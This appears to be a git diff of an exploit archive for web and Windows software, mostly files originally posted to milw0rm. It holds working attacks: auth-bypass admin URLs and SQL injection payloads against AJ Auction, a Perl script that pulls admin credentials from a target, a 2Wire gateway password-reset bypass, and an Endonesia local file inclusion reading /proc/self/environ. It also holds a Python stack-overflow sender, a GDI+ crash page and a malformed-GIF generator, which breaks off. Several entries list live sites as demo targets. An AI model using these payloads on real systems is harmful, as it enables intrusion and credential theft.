==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AJ Auction Auth Bypass Vulnerability
==============================================================================
[»] Script: [ AJ Auction ]
[»] Language: [ PHP ]
[»] Website: [ http://www.ajsquare.com/products/auction/ ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 10.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
[-] AJ Auction OOPD
[+] AJ Auction Pro Platinum Skin #1
[+] AJ Auction Pro Platinum Skin #2
[+] AJ Auction Web 2.0
===[ XPL ]===
[!] When the page gets load, Press ESC btn To Bypass Redirection ;)
[ Only AJ Auction Pro Platinum Skin #1 ]
[»] http://localhost/[path]/admin/user.php
[ all ]
[»] http://localhost/[path]/admin/site.php
[»] http://localhost/[path]/admin/auction.php
[»] http://localhost/[path]/admin/mail.php
[»] http://localhost/[path]/admin/fee_setting.php
[»] http://localhost/[path]/admin/earnings.php
[»] http://localhost/[path]/admin/insertion_fee_settings.php
[»] http://localhost/[path]/admin/custom_category.php
[»] http://localhost/[path]/admin/subcategory.php
[»] http://localhost/[path]/admin/category.php
[»] http://localhost/[path]/admin/report.php
[»] http://localhost/[path]/amdin/store_manager.php
[»] http://localhost/[path]/admin/choose_sell_format.php
[»] ...
===[ LIVE ]===
[!] Skin #1
[»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
[»] http://www.tapinglobal.com/admin/
[!] Web2.0
[»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-10]
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AJ Auction Auth Bypass Vulnerability
==============================================================================
[»] Script: [ AJ Auction ]
[»] Language: [ PHP ]
[»] Website: [ http://www.ajsquare.com/products/auction/ ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 10.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
[-] AJ Auction OOPD
[+] AJ Auction Pro Platinum Skin #1
[+] AJ Auction Pro Platinum Skin #2
[+] AJ Auction Web 2.0
===[ XPL ]===
[!] When the page gets load, Press ESC btn To Bypass Redirection ;)
[ Only AJ Auction Pro Platinum Skin #1 ]
[»] http://localhost/[path]/admin/user.php
[ all ]
[»] http://localhost/[path]/admin/site.php
[»] http://localhost/[path]/admin/auction.php
[»] http://localhost/[path]/admin/mail.php
[»] http://localhost/[path]/admin/fee_setting.php
[»] http://localhost/[path]/admin/earnings.php
[»] http://localhost/[path]/admin/insertion_fee_settings.php
[»] http://localhost/[path]/admin/custom_category.php
[»] http://localhost/[path]/admin/subcategory.php
[»] http://localhost/[path]/admin/category.php
[»] http://localhost/[path]/admin/report.php
[»] http://localhost/[path]/amdin/store_manager.php
[»] http://localhost/[path]/admin/choose_sell_format.php
[»] ...
===[ LIVE ]===
[!] Skin #1
[»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
[»] http://www.tapinglobal.com/admin/
[!] Web2.0
[»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-10]

64
platforms/php/webapps/7836.txt
View file

@ -1,32 +1,32 @@
==================================================================================================================
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
===================================================SNAKES TEAM====================================================
+ =
= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= :::::Mail: snakespc@gmail.com::::::: =
= = =
= http://www.ajsquare.com/products/auction/demo.php "index.php" =
=====================================GAZA=============================================
Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members
Str0ke ....Milw0rm
==================================================================GAZA============================================================
# milw0rm.com [2009-01-20]
==================================================================================================================
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
===================================================SNAKES TEAM====================================================
+ =
= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= :::::Mail: snakespc@gmail.com::::::: =
= = =
= http://www.ajsquare.com/products/auction/demo.php "index.php" =
=====================================GAZA=============================================
Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members
Str0ke ....Milw0rm
==================================================================GAZA============================================================
# milw0rm.com [2009-01-20]

106
platforms/php/webapps/9447.pl
View file

@ -1,53 +1,53 @@
#!/usr/bin/perl
#********************************************************#
# #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit #
# Software : AJ Auction Pro OOPD 2.x #
# Vendor : http://www.ajsquare.com/ #
# Author : NoGe #
# Contact : noge[dot]code[at]gmail[dot]com #
# Blog : http://evilc0de.blogspot.com #
# #
# [o] Usage #
# root@noge:~# perl ajpro.pl www.target.com #
# #
# [o] Dork #
# "Powered By AJ Auction Pro" #
# #
# [o] Greetz #
# MainHack BrotherHood [ http://mainhack.net ] #
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang #
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke #
# #
#********************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x] [C]oded By NoGe [x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
# milw0rm.com [2009-08-18]
#!/usr/bin/perl
#********************************************************#
# #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit #
# Software : AJ Auction Pro OOPD 2.x #
# Vendor : http://www.ajsquare.com/ #
# Author : NoGe #
# Contact : noge[dot]code[at]gmail[dot]com #
# Blog : http://evilc0de.blogspot.com #
# #
# [o] Usage #
# root@noge:~# perl ajpro.pl www.target.com #
# #
# [o] Dork #
# "Powered By AJ Auction Pro" #
# #
# [o] Greetz #
# MainHack BrotherHood [ http://mainhack.net ] #
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang #
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke #
# #
#********************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x] [C]oded By NoGe [x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
# milw0rm.com [2009-08-18]

40
platforms/php/webapps/9459.txt
View file

@ -1,20 +1,20 @@
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09)
DESCRIPTION
-----------------
Additional to the authentication bypass exploit page submitted by hkm.
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net/setup/password_required.html
bugz
# milw0rm.com [2009-08-18]
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09)
DESCRIPTION
-----------------
Additional to the authentication bypass exploit page submitted by hkm.
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net/setup/password_required.html
bugz
# milw0rm.com [2009-08-18]

22
platforms/php/webapps/9846.txt
View file

@ -1,22 +0,0 @@
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435

29
platforms/windows/dos/33403.py Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/37325/info
Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#!/usr/bin/python
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage Ill cut you open like a f***ing pig.
import sys
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")

88
platforms/windows/dos/6619.html
View file

@ -1,44 +1,44 @@
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>
<body>
<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>
<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
# milw0rm.com [2008-09-28]
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>
<body>
<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>
<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
# milw0rm.com [2008-09-28]

434
platforms/windows/dos/6716.pl
View file

@ -1,217 +1,217 @@
------------------------------------------------------------------------------------------------------------
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#1
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC".
"\x21\xEC".
#2
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#3
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#4
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#5
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#6
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#7
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#8
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#9
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#10
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#11
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E".
"\x01\x5A".
"\x00". ## Terminator
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#1
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#2
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#3
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
